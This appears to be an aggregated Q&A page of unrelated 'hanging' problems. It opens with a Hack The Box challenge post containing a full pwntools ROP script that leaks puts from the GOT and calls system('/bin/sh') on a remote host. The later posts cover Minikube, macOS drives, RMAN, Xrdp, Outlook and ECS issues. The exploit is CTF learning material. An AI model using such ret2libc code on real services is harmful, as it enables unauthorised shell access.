ROP Chain with pwntools hanging on partial puts statement

NOTE: The IP here is generic for the challenge and the instance referenced by the port has already been closed.

Hardening:

root@kali:~/htb/challenges/pwn/ropme# gdb -q ./ropme Reading symbols from ./ropme...(no debugging symbols found)...done. gdb-peda$   checksec  CANARY    : disabled FORTIFY   : disabled NX        : ENABLED PIE       : disabled RELRO     : Partial 

I have a binary that I have exploited locally and am now trying to port the exploit to a remote server.

The issue I have is that the script is hanging after I leak the memory of put in the GOT.

I thought the issue was the version of libc I was using, but having tried a few versions, I think what I am using is correct.

I have found the version by running the script and leaking puts…

Leaked: \x90\x06\x9b\x8c\x90\x7f root@kali:~/htb/challenges/pwn/ropme# libc-database/find puts 9b0690 ubuntu-xenial-amd64-libc6 (id libc6_2.23-0ubuntu10_amd64) archive-glibc (id libc6_2.23-0ubuntu11_amd64) 

I noticed though that when I removed the section of the script that attempts to leak __libc_start_main the script hangs and if that is commented out it hangs on the payload being sent.

I think this is down to pwntools expecting a string that doesn’t fully print.

You can see from the below output that it only prints (via puts) a partial string from the expected program output. Only R out of string.. ROP me outside, how 'about dah?. I added the new line character below.

root@kali:~/htb/challenges/pwn/ropme# python exploit.py  [+] Opening connection to 159.65.208.41 on port 34582: Done [+] Leaked puts@GLIBC: \x90\x86{\x18\x18\x7f     R Traceback (most recent call last):   File "exploit.py", line 29, in <module>     p.recvuntil("ROP me outside, how 'about dah?\n")   File "/usr/local/lib/python2.7/dist-packages/pwnlib/tubes/tube.py", line 305, in recvuntil     res = self.recv(timeout=self.timeout)   File "/usr/local/lib/python2.7/dist-packages/pwnlib/tubes/tube.py", line 78, in recv     return self._recv(numb, timeout) or ''   File "/usr/local/lib/python2.7/dist-packages/pwnlib/tubes/tube.py", line 156, in _recv     if not self.buffer and not self._fillbuffer(timeout):   File "/usr/local/lib/python2.7/dist-packages/pwnlib/tubes/tube.py", line 126, in _fillbuffer     data = self.recv_raw(self.buffer.get_fill_size())   File "/usr/local/lib/python2.7/dist-packages/pwnlib/tubes/sock.py", line 37, in recv_raw     data = self.sock.recv(numb, *a) KeyboardInterrupt [*] Closed connection to 159.65.208.41 port 34582 

My question is, what is interfering with the output of puts or is the issue elsewhere in the implementation of my script?

Main script…

#!/usr/bin/python  from pwn import * from socket import *  HOST = '159.65.208.41' PORT = 34582  p = remote(HOST, PORT)  ## Stage 1 junk = "A" * 72 pop_rdi = p64(0x4006d3) got_puts = p64(0x601018) plt_puts = p64(0x4004e0) plt_main = p64(0x400626) got_main = p64(0x601020)  # Leak address of puts in libc payload = junk + pop_rdi + got_puts + plt_puts + plt_main p.recvuntil("ROP me outside, how 'about dah?\n") p.sendline(payload) leaked_puts = p.recv()[:8].strip().ljust(8, "\x00") log.success("Leaked puts@GLIBC: " + str(leaked_puts)) leaked_puts = u64(leaked_puts)  # Leak address of __libc_main # payload = junk + pop_rdi + got_main + plt_puts + plt_main # p.recvuntil("ROP me outside, how 'about dah?\n") # p.sendline(payload) # leaked_got_main = p.recv()[:8].strip().ljust(8, "\x00") # log.success("Leaked __libc_start_main: " + str(leaked_got_main)) # leaked_got_main = u64(leaked_got_main)  # Stage 2 pop_rdi = p64(0x4006d3)  # libc6_2.23-0ubuntu10_amd64 + libc6_2.23-0ubuntu11_amd64 libc_puts = 0x6f690 libc_sys = 0x45390 libc_sh = 0x18cd57  offset = leaked_puts - libc_puts system = p64(offset + libc_sys) sh = p64(offset + libc_sh)  payload = junk + pop_rdi + sh + system  log.success("Only reaches here") p.recvuntil("ROP me outside, how 'about dah?\n") p.sendline(payload) log.success("Payload sent...")  # raw_input() p.interactive() 

Minikube VM hanging on Hyper-V

I’ve this issue where I can’t stop a minikube vm running on Hyper-V. The problem was that I delete the VM before the stop (manually from Hyper-V interface). Now when I run the minikube stop on the powershell as admin it throws me an error that said that Hyper-V can’t find any VM with that name. This is correct because I delete it from there, but my question would be, where I can stop that VM or how I can perform a clean install of Hyper-V (remembers all the configs after unable it).

My terminal and filesystem are hanging on MacOS

So I have had an external hard drive connected to my laptop, and have been writing millions of files to the external hard drive. One directory even has over 2 million folders at the first level deep.

Probably a dozen times my computer has frozen up. I have about 50+ windowed applications opened and every now and then my screen gets that nintendo glitch look to it where everything turns to lines and shakes. The glitching part doesn’t cause the freezing, but something is causing it. When it freezes the spinner goes on forever and I have to press the power button to shut it off.

I leave it shut off for at least 15 seconds before turning it on again. When I start again, it gives me back all my windows as they were, except the terminal windows aren’t in the right spot anymore, they’re just at the home directory.

I say all this because now I can’t even type ls inside /Volumes, it just hangs. I tried hard unplugging the hard drive and plugging it back in. It registers in the finder window as being present, but I simply can’t do ls /Volumes. I can’t cd /Volumes either. I can’t go into the hard drive. This only started happening after I’ve been writing millions of files to it.

It’s a Western Digital external hard drive.

Oh wait! There now ls has finally completed. It took about 10 minutes for it to register fully. Hmm… Wondering if you guys might know why it’s doing this. Why it’s not letting me get into the drive until long time.

So okay, now I just started writing more files. It let me write a few thousand more but now it’s hanging again. In these cases I can’t CTRL+C or CTRL+D to get out of the process, I have to open the Activity Monitor and Force Quit. But then it’s back to I can’t ls in the /Volumes. Wondering what the heck is going on.

I have also been typically running 3-5 processes all writing files in parallel.

Rman archive backups hanging due to datadomain issue cause Linux system hang

Dears,

We see that our Linux system became unresponsive. During that time we see from crashdump of server that there were 23k zombie processes of oracle and lot of uninterruptible processes of oracle.upon further analysis we saw that more than 12 rman archive backups were just hanging for more than 3-4 hours on this because of a hardware issue on underlying backup domain device and all were killed and someone restarted everything at once.Could someone please tell me if you faced similar issue? Backups should have been stopped during such issues but can we be sure that the backup hanging caused contention…please note that the hardware issue on the datadomain was causing the restarts of datadomain device and intermittent connectivity issues.

Data Migration assistant hanging on assesment

I am doing an assessment at a client with DMA. For most of the instances it goes through without issues. I have 3 instances that I am not able to complete due to the assessment getting stuck. I have left the assessment to run for 3 days and still it was not finished.

I am currently running manual assessments for individual databases.

Regards,

Xrdp hanging (Windows 10 to Xubuntu)

I have Xrdp installed and up-to-date on my Xubuntu machine and have opened up ports 3389 and 3350. However, when I attempt to start a remote desktop session from my Windows 10 machine, the connection hangs on a blank blue screen after login.

After about 5 minutes the connection fials with the error below:

  • connecting to sesman ip 127.0.0.1 port 3350
  • sesman connect ok
  • sending login info to session manager, please wait…
  • login successful for display 10
  • started connecting
  • connection problem, giving up
  • some problem

Xrdp was manually enabled, and all users logged out prior to remote session. Both Xorg and X11rdp session types used with same results.

Remote Session Error

How can I prevent Outlook from hanging when receiving Google Drive links?

Why, you might wonder, is this happening?

Google inserts an image after the link and that image URI does not contain a protocol (http or https). It looks something like this:

<img src="//ssl.gstatic.com/ui/v1/icons/common/x_8px.png"> 

Now, in a web browser, this will work just fine; the browser will use whatever protocol was used to load the page (usually https these days).

In Outlook, however, this is interpreted as a Windows File Sharing link.

So, Outlook decides to try to access that address using Windows File Sharing (on port 445) and, rather than denying the request, Google just ignores it, and Outlook stops responding until it times out 30 seconds later. And Outlook does this every time you open the message.

If you forward the message, Outlook tacks on a file protocol to the image URI:

<img src="file://ssl.gstatic.com/ui/v1/icons/common/x_8px.png"> 

And, of course, if the recipient has Outlook, he or she will experience the same issue (the file protocol doesn’t help; it just confirms that Outlook thinks it’s a reference to a file accessible via Windows File Sharing).

This appears to be version agnostic – it’s an issue with all versions of Outlook up to 2016.

ECS Ec2 Instance hanging outgoing TCP connections

I’m having issue with EC2/ECS server in AWS.
In my company we’re having dockerized application running on ECS cluster (it’s nodes are running on Linux 2 ECS optimized cluster AMIs). ECS Cluster is located in Private VPC subnets with NAT Gateway so they can access Internet. In front of it we have Load balancers in Subnets with Internet gateway (so they can be accessed from outside). Security groups, Network ACLs are properly configured. Further there are two docker apps. Let’s call them application A and application B. Each of theme are behind Internet-Facing Application Load Balancer.
Then how it works: Application A receives requests from Internet, put request on application A and also connects to some other application. It’s possible that container A and container B are running on the same ECS Cluster node. At some point application A is not able to connect to the Internet, or works rarely.
First I’ve been thinking that it’s a problem with application, however after logging in to the Linux I’ve noticed that even with stopped application A container and no other containers running (apart from ECS-agent container) – operating system is having problems establishing TCP connections, when I do curl www.google.com – first few requests are fine but one hangs, and it repeats. Ping is working. Dockerized containers are configured to use docker bridged networking and register targets behind load balancers es EC2 instances pointing to ports on which application is listening. Any ideas what could cause the issue?